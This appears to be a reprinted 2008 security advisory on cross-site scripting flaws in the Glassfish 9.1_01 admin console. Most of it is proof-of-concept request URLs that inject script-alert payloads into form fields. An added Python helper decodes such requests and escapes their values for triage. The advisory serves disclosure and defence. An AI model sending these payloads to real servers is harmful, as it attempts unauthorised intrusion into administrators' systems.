Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs))

2008-06-21 / 2008-06-22
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

==============================
Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs))
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 14 June 2008
Site: http://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Description:
This vulnerability affects several pages of the Glassfish webadmin interface: a user can submit malicious or unexpected data through the input fields of those pages. It was found in more than 10 input fields in Glassfish.

Vulnerable URLs:

http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&propertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Acol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%

http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFlowPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_id201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<script>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_id125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2

http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xss')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>alert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton

And others =)

--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
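The PoC requests above carry their payloads inside percent-encoded JSF parameter names and values (%3A for ':', %3Cscript%3E for '<script>'), so a triage or log-review tool has to decode them before it can see what would have been echoed into the page. The following Python helper is an added example, not code from the advisory or from Glassfish: it decodes each parameter, flags values containing HTML-active characters, and shows the HTML-escaped form that a correctly encoding page would have rendered. The sample request is a constructed, shortened version of the jdbcResourceNew.jsf PoC with a placeholder host.

```python
"""Added triage helper (not from the advisory): decode the JSF query parameters
of a captured admin-console request and flag values that would break out of an
HTML text node if the console echoed them back unencoded."""
from html import escape
from urllib.parse import parse_qsl, urlsplit

# Characters that change meaning when a value lands in HTML without encoding.
HTML_ACTIVE = set('<>"\'&')


def suspicious_params(url):
    """Map decoded parameter name -> decoded value for every parameter whose
    value contains HTML-active characters. parse_qsl undoes the %3A (':'),
    %3C ('<') and %27 (''') encoding seen in the PoC URLs, so an encoded
    '%3Cscript%3E' and a literal '<script>' are treated the same way."""
    query = urlsplit(url).query
    return {
        name: value
        for name, value in parse_qsl(query, keep_blank_values=True)
        if HTML_ACTIVE & set(value)
    }


def safe_echo(value):
    """HTML-escape a field value for rendering inside a text node: the browser
    then displays the payload as text instead of executing it. This is the
    encoding step a page needs before echoing form input back to the user."""
    return escape(value, quote=True)


# Constructed sample: a shortened form of the jdbcResourceNew.jsf PoC above.
# glassfish.example is a placeholder host, not a real system.
SAMPLE_REQUEST = (
    "http://glassfish.example:4848/resourceNode/jdbcResourceNew.jsf"
    "?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3Ajnditext="
    "%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName="
    "__CallFlowPool"
    "&propertyForm%3AhelpKey=jdbcresourcenew.html"
)

if __name__ == "__main__":
    for name, value in suspicious_params(SAMPLE_REQUEST).items():
        print(f"{name}\n  decoded: {value}\n  escaped: {safe_echo(value)}")
```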

References:

http://www.securityfocus.com/bid/29751
http://www.securityfocus.com/archive/1/archive/1/493370/100/0/threaded


Copyright 2024, cxsecurity.com
